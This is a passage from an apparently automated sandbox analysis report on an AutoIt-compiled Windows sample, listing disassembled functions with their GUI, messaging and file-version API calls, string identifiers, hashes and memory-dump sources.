                    • ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 007C808F
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
                    • String ID: $AutoIt v3$DISPLAY$static
                    • API String ID: 2211948467-2373415609
                    • Opcode ID: f367591440bd5267764872492fc7a8d260ba558efe3800f081f7ff7884dd55dd
                    • Instruction ID: ab5e49b72bfefc9d14f646e2224329ec25cfba1b36f336b2dcf0e157d0879262
                    • Opcode Fuzzy Hash: f367591440bd5267764872492fc7a8d260ba558efe3800f081f7ff7884dd55dd
                    • Instruction Fuzzy Hash: 4C024871900119EFDB14DFA4CC89EAE7BB9FB48310F14815DF916AB2A1DB78AD01CB60
                    Function 007D37F3 Relevance: 51.1, APIs: 6, Strings: 23, Instructions: 365windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?,007DF910), ref: 007D38AF
                    • IsWindowVisible.USER32(?), ref: 007D38D3
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: BuffCharUpperVisibleWindow
                    • String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
                    • API String ID: 4105515805-45149045
                    • Opcode ID: cd7d7281345130de09e12e7bf4cb95ed5911e2c2b917e8c9ad82cf2988ee6212
                    • Instruction ID: 8b01d9eeca92f1c706f21d8061b4509840a5f68ca0353cda3dde0d4a21ed69a0
                    • Opcode Fuzzy Hash: cd7d7281345130de09e12e7bf4cb95ed5911e2c2b917e8c9ad82cf2988ee6212
                    • Instruction Fuzzy Hash: 51D1B830204305DBCB14EF60C855A6E77B5EF94344F14845AF98A5B3E2DB79EE0ACB92
                    Function 007DA849 Relevance: 49.8, APIs: 33, Instructions: 274COMMON
                    Download Yara Rule
                    APIs
                    • SetTextColor.GDI32(?,00000000), ref: 007DA89F
                    • GetSysColorBrush.USER32(0000000F), ref: 007DA8D0
                    • GetSysColor.USER32(0000000F), ref: 007DA8DC
                    • SetBkColor.GDI32(?,000000FF), ref: 007DA8F6
                    • SelectObject.GDI32(?,?), ref: 007DA905
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 007DA930
                    • GetSysColor.USER32(00000010), ref: 007DA938
                    • CreateSolidBrush.GDI32(00000000), ref: 007DA93F
                    • FrameRect.USER32(?,?,00000000), ref: 007DA94E
                    • DeleteObject.GDI32(00000000), ref: 007DA955
                    • InflateRect.USER32(?,000000FE,000000FE), ref: 007DA9A0
                    • FillRect.USER32(?,?,?), ref: 007DA9D2
                    • GetWindowLongW.USER32(?,000000F0), ref: 007DA9FD
                      • Part of subcall function 007DAB60: GetSysColor.USER32(00000012), ref: 007DAB99
                      • Part of subcall function 007DAB60: SetTextColor.GDI32(?,?), ref: 007DAB9D
                      • Part of subcall function 007DAB60: GetSysColorBrush.USER32(0000000F), ref: 007DABB3
                      • Part of subcall function 007DAB60: GetSysColor.USER32(0000000F), ref: 007DABBE
                      • Part of subcall function 007DAB60: GetSysColor.USER32(00000011), ref: 007DABDB
                      • Part of subcall function 007DAB60: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007DABE9
                      • Part of subcall function 007DAB60: SelectObject.GDI32(?,00000000), ref: 007DABFA
                      • Part of subcall function 007DAB60: SetBkColor.GDI32(?,00000000), ref: 007DAC03
                      • Part of subcall function 007DAB60: SelectObject.GDI32(?,?), ref: 007DAC10
                      • Part of subcall function 007DAB60: InflateRect.USER32(?,000000FF,000000FF), ref: 007DAC2F
                      • Part of subcall function 007DAB60: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007DAC46
                      • Part of subcall function 007DAB60: GetWindowLongW.USER32(00000000,000000F0), ref: 007DAC5B
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
                    • String ID:
                    • API String ID: 4124339563-0
                    • Opcode ID: 21562c3fe354877030e6202bb99dbf4acde837fa68178d5a145f274d91af1e8c
                    • Instruction ID: 840342510be62a740a33ea2eb94c11e809ac3914ffaf7bdc633036a494e6f197
                    • Opcode Fuzzy Hash: 21562c3fe354877030e6202bb99dbf4acde837fa68178d5a145f274d91af1e8c
                    • Instruction Fuzzy Hash: 91A19D72009305FFD7119F64DC08A6B7BB9FF88321F148A2AF963962A0D739D944CB56
                    Function 007C77BE Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON
                    Download Yara Rule
                    APIs
                    • DestroyWindow.USER32(00000000), ref: 007C77F1
                    • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007C78B0
                    • SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007C78EE
                    • AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007C7900
                    • CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007C7946
                    • GetClientRect.USER32(00000000,?), ref: 007C7952
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007C7996
                    • CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007C79A5
                    • GetStockObject.GDI32(00000011), ref: 007C79B5
                    • SelectObject.GDI32(00000000,00000000), ref: 007C79B9
                    • GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007C79C9
                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007C79D2
                    • DeleteDC.GDI32(00000000), ref: 007C79DB
                    • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007C7A07
                    • SendMessageW.USER32(00000030,00000000,00000001), ref: 007C7A1E
                    • CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007C7A59
                    • SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007C7A6D
                    • SendMessageW.USER32(00000404,00000001,00000000), ref: 007C7A7E
                    • CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007C7AAE
                    • GetStockObject.GDI32(00000011), ref: 007C7AB9
                    • SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007C7AC4
                    • ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007C7ACE
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
                    • String ID: AutoIt v3$DISPLAY$msctls_progress32$static
                    • API String ID: 2910397461-517079104
                    • Opcode ID: 32657b0212789f87f980fd5dc69a635f11475ed40c0a457c8bc896157778ad17
                    • Instruction ID: e53165a38689146095d70d65ad3a15d6337dd2f3573e39b392610ccea0ab1c7e
                    • Opcode Fuzzy Hash: 32657b0212789f87f980fd5dc69a635f11475ed40c0a457c8bc896157778ad17
                    • Instruction Fuzzy Hash: 1CA152B1A40219FFEB149B64DC4AFAA7BB9EF44710F048119FA15A72E0D7B4AD10CB64
                    Function 007BAF7B Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON
                    Download Yara Rule
                    APIs
                    • SetErrorMode.KERNEL32(00000001), ref: 007BAF89
                    • GetDriveTypeW.KERNEL32(?,007DFAC0,?,\\.\,007DF910), ref: 007BB066
                    • SetErrorMode.KERNEL32(00000000,007DFAC0,?,\\.\,007DF910), ref: 007BB1C4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: ErrorMode$DriveType
                    • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                    • API String ID: 2907320926-4222207086
                    • Opcode ID: d66ed9d1997ade2798ee1e674a919e73932dc0a2def94af024f66e46982800b8
                    • Instruction ID: f10a289127fd7185805b80f40e641ae034fe766e1d24b0a37beed13fd82ecb9e
                    • Opcode Fuzzy Hash: d66ed9d1997ade2798ee1e674a919e73932dc0a2def94af024f66e46982800b8
                    • Instruction Fuzzy Hash: 6751803068430DEACB18EB28CD96AFD73B1FB543417208015EC6AE72D1D7AD9D46DB52
                    Function 00756A3C Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON
                    Download Yara Rule
                    APIs
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: __wcsnicmp
                    • String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                    • API String ID: 1038674560-86951937
                    • Opcode ID: 5ce0178840c71781703a6b8d860fe39574c66ae4f050643142fecd655463e5fe
                    • Instruction ID: 70b0ff21b95c7103c137bcda7120331197cac10e4a444329b391683776af94e5
                    • Opcode Fuzzy Hash: 5ce0178840c71781703a6b8d860fe39574c66ae4f050643142fecd655463e5fe
                    • Instruction Fuzzy Hash: A481F4B0640345EACF24BA30CC87FEE7768AF15741F548025FD45AB182EBACDA49D391
                    Function 007DAB60 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetSysColor.USER32(00000012), ref: 007DAB99
                    • SetTextColor.GDI32(?,?), ref: 007DAB9D
                    • GetSysColorBrush.USER32(0000000F), ref: 007DABB3
                    • GetSysColor.USER32(0000000F), ref: 007DABBE
                    • CreateSolidBrush.GDI32(?), ref: 007DABC3
                    • GetSysColor.USER32(00000011), ref: 007DABDB
                    • CreatePen.GDI32(00000000,00000001,00743C00), ref: 007DABE9
                    • SelectObject.GDI32(?,00000000), ref: 007DABFA
                    • SetBkColor.GDI32(?,00000000), ref: 007DAC03
                    • SelectObject.GDI32(?,?), ref: 007DAC10
                    • InflateRect.USER32(?,000000FF,000000FF), ref: 007DAC2F
                    • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007DAC46
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 007DAC5B
                    • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007DACA7
                    • GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007DACCE
                    • InflateRect.USER32(?,000000FD,000000FD), ref: 007DACEC
                    • DrawFocusRect.USER32(?,?), ref: 007DACF7
                    • GetSysColor.USER32(00000011), ref: 007DAD05
                    • SetTextColor.GDI32(?,00000000), ref: 007DAD0D
                    • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007DAD21
                    • SelectObject.GDI32(?,007DA869), ref: 007DAD38
                    • DeleteObject.GDI32(?), ref: 007DAD43
                    • SelectObject.GDI32(?,?), ref: 007DAD49
                    • DeleteObject.GDI32(?), ref: 007DAD4E
                    • SetTextColor.GDI32(?,?), ref: 007DAD54
                    • SetBkColor.GDI32(?,?), ref: 007DAD5E
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                    • String ID:
                    • API String ID: 1996641542-0
                    • Opcode ID: 454221cdf4c4ebb4734ac9b57a67bb0e01845896ae7c59e534d62300fa864c72
                    • Instruction ID: c76b3800723c062a1a7b91d957ba0b25f4a7700233607ff85dcb693cbe3cc70b
                    • Opcode Fuzzy Hash: 454221cdf4c4ebb4734ac9b57a67bb0e01845896ae7c59e534d62300fa864c72
                    • Instruction Fuzzy Hash: 07614E71901218FFDF119FA4DC48EAE7BB9FB08320F148126F916AB2A1D7799D40DB90
                    Function 007D8C44 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON
                    Download Yara Rule
                    APIs
                    • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007D8D34
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D8D45
                    • CharNextW.USER32(0000014E), ref: 007D8D74
                    • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007D8DB5
                    • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007D8DCB
                    • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007D8DDC
                    • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007D8DF9
                    • SetWindowTextW.USER32(?,0000014E), ref: 007D8E45
                    • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007D8E5B
                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 007D8E8C
                    • _memset.LIBCMT ref: 007D8EB1
                    • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007D8EFA
                    • _memset.LIBCMT ref: 007D8F59
                    • SendMessageW.USER32(?,00001053,000000FF,?), ref: 007D8F83
                    • SendMessageW.USER32(?,00001074,?,00000001), ref: 007D8FDB
                    • SendMessageW.USER32(?,0000133D,?,?), ref: 007D9088
                    • InvalidateRect.USER32(?,00000000,00000001), ref: 007D90AA
                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D90F4
                    • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007D9121
                    • DrawMenuBar.USER32(?), ref: 007D9130
                    • SetWindowTextW.USER32(?,0000014E), ref: 007D9158
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                    • String ID: 0
                    • API String ID: 1073566785-4108050209
                    • Opcode ID: b6f497a4f54ba61830bbef708550ba7a2ee2560eeed39b41b787a04876d88823
                    • Instruction ID: 8168ca9c236495cfca747a6212305e0a195259ba76f96ffdc3c4702ac26313ab
                    • Opcode Fuzzy Hash: b6f497a4f54ba61830bbef708550ba7a2ee2560eeed39b41b787a04876d88823
                    • Instruction Fuzzy Hash: 04E17070901209EADF209F64CC88EEE7B79EF05710F108157F95AAA2D1DB789A81DF61
                    Function 007D4B16 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetCursorPos.USER32(?), ref: 007D4C51
                    • GetDesktopWindow.USER32 ref: 007D4C66
                    • GetWindowRect.USER32(00000000), ref: 007D4C6D
                    • GetWindowLongW.USER32(?,000000F0), ref: 007D4CCF
                    • DestroyWindow.USER32(?), ref: 007D4CFB
                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007D4D24
                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007D4D42
                    • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007D4D68
                    • SendMessageW.USER32(?,00000421,?,?), ref: 007D4D7D
                    • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007D4D90
                    • IsWindowVisible.USER32(?), ref: 007D4DB0
                    • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007D4DCB
                    • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007D4DDF
                    • GetWindowRect.USER32(?,?), ref: 007D4DF7
                    • MonitorFromPoint.USER32(?,?,00000002), ref: 007D4E1D
                    • GetMonitorInfoW.USER32(00000000,?), ref: 007D4E37
                    • CopyRect.USER32(?,?), ref: 007D4E4E
                    • SendMessageW.USER32(?,00000412,00000000), ref: 007D4EB9
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                    • String ID: ($0$tooltips_class32
                    • API String ID: 698492251-4156429822
                    • Opcode ID: bafb6db0086d8652b5e73d3e287ef1d82dc4292457e25c80b2d22121e68c4a8b
                    • Instruction ID: 89171bd8c8a8c00b88b6e75c959864e31138ea52205fd695d88c40f755599fdd
                    • Opcode Fuzzy Hash: bafb6db0086d8652b5e73d3e287ef1d82dc4292457e25c80b2d22121e68c4a8b
                    • Instruction Fuzzy Hash: 45B14971604341EFDB04DF64C949B5ABBF5BB84310F00891AF99A9B2A1DB79E804CBA5
                    Function 007B46D6 Relevance: 36.9, APIs: 16, Strings: 5, Instructions: 179COMMON
                    Download Yara Rule
                    APIs
                    • GetFileVersionInfoSizeW.VERSION(?,?), ref: 007B46E8
                    • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 007B470E
                    • _wcscpy.LIBCMT ref: 007B473C
                    • _wcscmp.LIBCMT ref: 007B4747
                    • _wcscat.LIBCMT ref: 007B475D
                    • _wcsstr.LIBCMT ref: 007B4768
                    • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 007B4784
                    • _wcscat.LIBCMT ref: 007B47CD
                    • _wcscat.LIBCMT ref: 007B47D4
                    • _wcsncpy.LIBCMT ref: 007B47FF
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                    • API String ID: 699586101-1459072770
                    • Opcode ID: b32ca4c43491afd1f0614b86d4867574aad867c18d925c2a2a39e681b9056bed
                    • Instruction ID: b4a14d3ff33ce323693ce723a69d849ec41256b790a1b611ed57bfc60057d7b0
                    • Opcode Fuzzy Hash: b32ca4c43491afd1f0614b86d4867574aad867c18d925c2a2a39e681b9056bed
                    • Instruction Fuzzy Hash: B541F975600310FADB14AB648C4AFFF777CEF42750F048066F909E6283EB7CA90196A5
                    Function 007527D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                    Download Yara Rule
                    APIs
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007528BC
                    • GetSystemMetrics.USER32(00000007), ref: 007528C4
                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007528EF
                    • GetSystemMetrics.USER32(00000008), ref: 007528F7
                    • GetSystemMetrics.USER32(00000004), ref: 0075291C
                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00752939
                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00752949
                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0075297C
                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00752990
                    • GetClientRect.USER32(00000000,000000FF), ref: 007529AE
                    • GetStockObject.GDI32(00000011), ref: 007529CA
                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 007529D5
                      • Part of subcall function 00752344: GetCursorPos.USER32(?), ref: 00752357
                      • Part of subcall function 00752344: ScreenToClient.USER32(008167B0,?), ref: 00752374
                      • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000001), ref: 00752399
                      • Part of subcall function 00752344: GetAsyncKeyState.USER32(00000002), ref: 007523A7
                    • SetTimer.USER32(00000000,00000000,00000028,00751256), ref: 007529FC
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_750000_SecuriteInfo.jbxd
                    Similarity
                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                    • String ID: AutoIt v3 GUI
                    • API String ID: 1458621304-248962490
                    • Opcode ID: 9054897501b9a0ebd8a20d8244da0c1758e8c7d5951a1fa6b178a84b913975ae
                    • Instruction ID: babdacc71580dd8d6cf0604ee7c8c21b0835c7ad1ed51b8af6d20ce3d68fb631
                    • Opcode Fuzzy Hash: 9054897501b9a0ebd8a20d8244da0c1758e8c7d5951a1fa6b178a84b913975ae
                    • Instruction Fuzzy Hash: 3FB16F71A4020ADFDB15DFA8DC45BED7BB4FB08311F108229FE16E6290DB78A856CB54
                    Function 007D4069 Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                    Download Yara Rule
                    APIs
                    • CharUpperBuffW.USER32(?,?), ref: 007D40F6
                    • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007D41B6
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.2107560078.0000000000751000.00000020.00000001.01000000.00000003.sdmp, Offset: 00750000, based on PE: true
                    • Associated: 00000000.00000002.2105737115.0000000000750000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.00000000007DF000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109003063.0000000000805000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109062249.000000000080F000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.2109083311.0000000000818000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
